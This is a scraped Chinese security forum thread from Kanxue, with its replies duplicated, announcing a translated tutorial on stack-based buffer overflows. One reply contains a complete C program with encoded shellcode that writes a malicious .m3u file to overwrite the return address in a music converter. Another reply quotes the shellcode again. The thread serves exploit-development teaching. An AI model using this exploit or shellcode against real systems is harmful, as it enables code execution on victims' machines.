[翻译]Exploit 编写系列教程第一篇：基于栈的溢出-外文翻译-看雪-安全社区|安全招聘|kanxue.com

[翻译]Exploit 编写系列教程第一篇：基于栈的溢出

2009-11-16 19:59 57232

[翻译]Exploit 编写系列教程第一篇：基于栈的溢出

moonife

2009-11-16 19:59

57232

第一篇翻译完成
PS:对初学者来讲这是个很不错的漏洞利用的系列教程，相当详细
详细到让我在翻译过程中倍感纠结

[培训]《安卓高级研修班(网课)》月薪三万计划，掌握调试、分析还原ollvm、vmp的方法，定制art虚拟机自动化脱壳的方法

上传的附件：

Exploit 编写系列教程第一篇.pdf （1.02MB，3195次下载）

收藏・32

点赞・9

打赏

最新回复 (59) 1 2 3 ▶
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 227 关注私信	riusksk 41 2009-11-16 22:43 3 楼 0 终于出来了，第二篇目前我正在翻译中，希望有更多的兄弟加入这项翻译工作中来！
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 227 关注私信	riusksk 41 2009-11-17 20:01 4 楼 0 yi……怎么没加精呢，上万字哟
smarttop 雪币： 61 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 42 粉丝 0 关注私信	smarttop 2009-11-17 20:21 5 楼 0 一定要精呀
kanxue 雪币： 29414 活跃值： (18625) 能力值： (RANK：350 ) 在线值：发帖 1826 回帖 15212 粉丝 485 关注私信	kanxue 8 2009-11-17 20:51 6 楼 0 辛苦辛苦~~
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 227 关注私信	riusksk 41 2009-11-17 20:54 7 楼 0 第二篇目前翻译了七千多字，还在翻译中……
crdchen 雪币： 272 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 22 粉丝 0 关注私信	crdchen 2009-11-17 21:17 8 楼 0 thanks
moonife 雪币： 370 活跃值： (52) 能力值： ( LV13，RANK：350 ) 在线值：发帖 129 回帖 843 粉丝 4 关注私信	moonife 8 2009-11-18 16:11 9 楼 0 我跟了下程序的溢出情况，下面的是关键信息，有兴趣的朋友可以详细分析下: 00E58D93 F3:A5 rep movs dword ptr es:[edi], dword p> ;这里导致溢出 0041E9E6 \|. 81C4 18890000 add esp, 8918 0041E9EC \. C2 0400 retn 4 ;这里覆盖EIP 文中的创建m3u用的perl脚本我不会我用C写做测试贴上来做参考呵呵： #include <windows.h> #pragma comment(linker,"/subsystem:windows") char Buffer[26094]={0}; DWORD eip=0x73d92ecf; //覆盖返回地址 DWORD param1=0x90909090; //覆盖retn 4 被栈平衡的参数 char nops[25]={0}; char shellcode[]= "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" "\x7f\xe8\x7b\xca"; int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd ) { HANDLE hFile; DWORD temp; hFile=CreateFile("crash.m3u",GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL); memset(Buffer,'A',26094); memset(nops,0x90,25); WriteFile(hFile,Buffer,26094-31-8,&temp,NULL); WriteFile(hFile,&eip,4,&temp,NULL); WriteFile(hFile,¶m1,4,&temp,NULL); WriteFile(hFile,nops,25,&temp,NULL); WriteFile(hFile,shellcode,sizeof(shellcode),&temp,NULL); CloseHandle(hFile); MessageBox(NULL,"Done","Info",0); return 0; }
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 227 关注私信	riusksk 41 2009-11-18 16:40 10 楼 0 膜拜moonife,我还想等第二篇翻译完了，也分析一下，结果被你抢先了！建议把软件也传上来吧，呵呵…
gamehacker 雪币： 131 活跃值： (98) 能力值： ( LV5，RANK：60 ) 在线值：发帖 12 回帖 334 粉丝 2 关注私信	gamehacker 1 2009-11-18 16:56 11 楼 0 支持楼主期待更精彩的文章
huzhao 雪币： 388 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 9 回帖 124 粉丝 0 关注私信	huzhao 2009-11-19 21:25 12 楼 0 非常的期待啊,呵呵
非虫雪币： 2305 活跃值： (968) 能力值： (RANK：350 ) 在线值：发帖 31 回帖 408 粉丝 125 关注私信	非虫 7 2009-11-20 12:37 13 楼 0 今天才看到，经典，学习了。
hawking 雪币： 1969 活跃值： (46) 能力值： (RANK：550 ) 在线值：发帖 34 回帖 511 粉丝 5 关注私信	hawking 12 2009-11-20 14:43 14 楼 0 学习了顺便传一下相应版本的文件上传的附件： EasyRMtoMP3Converter.rar （2.83MB，220次下载）
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 227 关注私信	riusksk 41 2009-11-20 18:13 15 楼 0 感谢hawking版主大人分享，哈哈……
笨l笨雪币： 224 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 15 回帖 100 粉丝 0 关注私信	笨l笨 2009-11-20 21:28 16 楼 0 不错不错。支持！！！
jordanpz 雪币： 34 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 343 粉丝 0 关注私信	jordanpz 2009-11-20 22:32 17 楼 0 你是只感谢没有下载。。。。。。。
kinglord 雪币： 558 活跃值： (46) 能力值： ( LV2，RANK：16 ) 在线值：发帖 1 回帖 265 粉丝 0 关注私信	kinglord 2009-11-21 00:15 18 楼 0 支持楼主。。。等待下一步成果
吹风生雪币： 390 活跃值： (15) 能力值： ( LV8，RANK：130 ) 在线值：发帖 16 回帖 92 粉丝 1 关注私信	吹风生 3 2009-11-21 02:45 19 楼 0 moonife，你太强悍了，原来你一直忙着翻译这个哈，牛，我也想翻哈。
小天狼星雪币： 270 能力值： (RANK：10 ) 在线值：发帖 4 回帖 239 粉丝 0 关注私信	小天狼星 2009-11-21 22:41 20 楼 0 “这里我们用WinDbg，按照WinDbg（完全安装）和用“windbg -I”注册它为一个“post-mortem” 调试器” post-mortem debugger 就是即时调试器的意思
moonife 雪币： 370 活跃值： (52) 能力值： ( LV13，RANK：350 ) 在线值：发帖 129 回帖 843 粉丝 4 关注私信	moonife 8 2009-11-21 22:57 21 楼 0 恩感谢小天狼星指出 “安装”打成“按照”了
aoyuhuaoju 雪币： 211 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 118 粉丝 0 关注私信	aoyuhuaoju 2009-12-5 15:44 22 楼 0 "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" 这是加密的代码吗
moonife 雪币： 370 活跃值： (52) 能力值： ( LV13，RANK：350 ) 在线值：发帖 129 回帖 843 粉丝 4 关注私信	moonife 8 2009-12-5 18:11 23 楼 0 这个是可以执行，一般用于测试的shellcode 被加密过了，开头部分开始自解码的你可以拉人OD跟下
dreamzgj 雪币： 1137 活跃值： (10) 能力值： ( LV7，RANK：100 ) 在线值：发帖 24 回帖 413 粉丝 0 关注私信	dreamzgj 2 2009-12-7 23:15 24 楼 0 刚在moonife兄的blog里才看到! 我收藏了哈!
俊虎雪币： 217 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 133 粉丝 0 关注私信	俊虎 2009-12-8 17:01 25 楼 0 刚看到，收藏了，辛苦
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

moonife

129

发帖

843

回帖

350

RANK

关注

私信

他的文章

[注意]邀请码发放公布（06.15~07.14）

关于我们

联系我们

企业服务

看雪公众号

最新回复 (59) 1 2 3 ▶
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 227 关注私信	riusksk 41 2009-11-16 22:43 3 楼 0 终于出来了，第二篇目前我正在翻译中，希望有更多的兄弟加入这项翻译工作中来！
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 227 关注私信	riusksk 41 2009-11-17 20:01 4 楼 0 yi……怎么没加精呢，上万字哟
smarttop 雪币： 61 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 42 粉丝 0 关注私信	smarttop 2009-11-17 20:21 5 楼 0 一定要精呀
kanxue 雪币： 29414 活跃值： (18625) 能力值： (RANK：350 ) 在线值：发帖 1826 回帖 15212 粉丝 485 关注私信	kanxue 8 2009-11-17 20:51 6 楼 0 辛苦辛苦~~
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 227 关注私信	riusksk 41 2009-11-17 20:54 7 楼 0 第二篇目前翻译了七千多字，还在翻译中……
crdchen 雪币： 272 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 22 粉丝 0 关注私信	crdchen 2009-11-17 21:17 8 楼 0 thanks
moonife 雪币： 370 活跃值： (52) 能力值： ( LV13，RANK：350 ) 在线值：发帖 129 回帖 843 粉丝 4 关注私信	moonife 8 2009-11-18 16:11 9 楼 0 我跟了下程序的溢出情况，下面的是关键信息，有兴趣的朋友可以详细分析下: 00E58D93 F3:A5 rep movs dword ptr es:[edi], dword p> ;这里导致溢出 0041E9E6 \|. 81C4 18890000 add esp, 8918 0041E9EC \. C2 0400 retn 4 ;这里覆盖EIP 文中的创建m3u用的perl脚本我不会我用C写做测试贴上来做参考呵呵： #include <windows.h> #pragma comment(linker,"/subsystem:windows") char Buffer[26094]={0}; DWORD eip=0x73d92ecf; //覆盖返回地址 DWORD param1=0x90909090; //覆盖retn 4 被栈平衡的参数 char nops[25]={0}; char shellcode[]= "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" "\x7f\xe8\x7b\xca"; int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd ) { HANDLE hFile; DWORD temp; hFile=CreateFile("crash.m3u",GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL); memset(Buffer,'A',26094); memset(nops,0x90,25); WriteFile(hFile,Buffer,26094-31-8,&temp,NULL); WriteFile(hFile,&eip,4,&temp,NULL); WriteFile(hFile,¶m1,4,&temp,NULL); WriteFile(hFile,nops,25,&temp,NULL); WriteFile(hFile,shellcode,sizeof(shellcode),&temp,NULL); CloseHandle(hFile); MessageBox(NULL,"Done","Info",0); return 0; }
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 227 关注私信	riusksk 41 2009-11-18 16:40 10 楼 0 膜拜moonife,我还想等第二篇翻译完了，也分析一下，结果被你抢先了！建议把软件也传上来吧，呵呵…
gamehacker 雪币： 131 活跃值： (98) 能力值： ( LV5，RANK：60 ) 在线值：发帖 12 回帖 334 粉丝 2 关注私信	gamehacker 1 2009-11-18 16:56 11 楼 0 支持楼主期待更精彩的文章
huzhao 雪币： 388 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 9 回帖 124 粉丝 0 关注私信	huzhao 2009-11-19 21:25 12 楼 0 非常的期待啊,呵呵
非虫雪币： 2305 活跃值： (968) 能力值： (RANK：350 ) 在线值：发帖 31 回帖 408 粉丝 125 关注私信	非虫 7 2009-11-20 12:37 13 楼 0 今天才看到，经典，学习了。
hawking 雪币： 1969 活跃值： (46) 能力值： (RANK：550 ) 在线值：发帖 34 回帖 511 粉丝 5 关注私信	hawking 12 2009-11-20 14:43 14 楼 0 学习了顺便传一下相应版本的文件上传的附件： EasyRMtoMP3Converter.rar （2.83MB，220次下载）
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 227 关注私信	riusksk 41 2009-11-20 18:13 15 楼 0 感谢hawking版主大人分享，哈哈……
笨l笨雪币： 224 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 15 回帖 100 粉丝 0 关注私信	笨l笨 2009-11-20 21:28 16 楼 0 不错不错。支持！！！
jordanpz 雪币： 34 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 343 粉丝 0 关注私信	jordanpz 2009-11-20 22:32 17 楼 0 你是只感谢没有下载。。。。。。。
kinglord 雪币： 558 活跃值： (46) 能力值： ( LV2，RANK：16 ) 在线值：发帖 1 回帖 265 粉丝 0 关注私信	kinglord 2009-11-21 00:15 18 楼 0 支持楼主。。。等待下一步成果
吹风生雪币： 390 活跃值： (15) 能力值： ( LV8，RANK：130 ) 在线值：发帖 16 回帖 92 粉丝 1 关注私信	吹风生 3 2009-11-21 02:45 19 楼 0 moonife，你太强悍了，原来你一直忙着翻译这个哈，牛，我也想翻哈。
小天狼星雪币： 270 能力值： (RANK：10 ) 在线值：发帖 4 回帖 239 粉丝 0 关注私信	小天狼星 2009-11-21 22:41 20 楼 0 “这里我们用WinDbg，按照WinDbg（完全安装）和用“windbg -I”注册它为一个“post-mortem” 调试器” post-mortem debugger 就是即时调试器的意思
moonife 雪币： 370 活跃值： (52) 能力值： ( LV13，RANK：350 ) 在线值：发帖 129 回帖 843 粉丝 4 关注私信	moonife 8 2009-11-21 22:57 21 楼 0 恩感谢小天狼星指出 “安装”打成“按照”了
aoyuhuaoju 雪币： 211 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 118 粉丝 0 关注私信	aoyuhuaoju 2009-12-5 15:44 22 楼 0 "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" 这是加密的代码吗
moonife 雪币： 370 活跃值： (52) 能力值： ( LV13，RANK：350 ) 在线值：发帖 129 回帖 843 粉丝 4 关注私信	moonife 8 2009-12-5 18:11 23 楼 0 这个是可以执行，一般用于测试的shellcode 被加密过了，开头部分开始自解码的你可以拉人OD跟下
dreamzgj 雪币： 1137 活跃值： (10) 能力值： ( LV7，RANK：100 ) 在线值：发帖 24 回帖 413 粉丝 0 关注私信	dreamzgj 2 2009-12-7 23:15 24 楼 0 刚在moonife兄的blog里才看到! 我收藏了哈!
俊虎雪币： 217 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 133 粉丝 0 关注私信	俊虎 2009-12-8 17:01 25 楼 0 刚看到，收藏了，辛苦
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复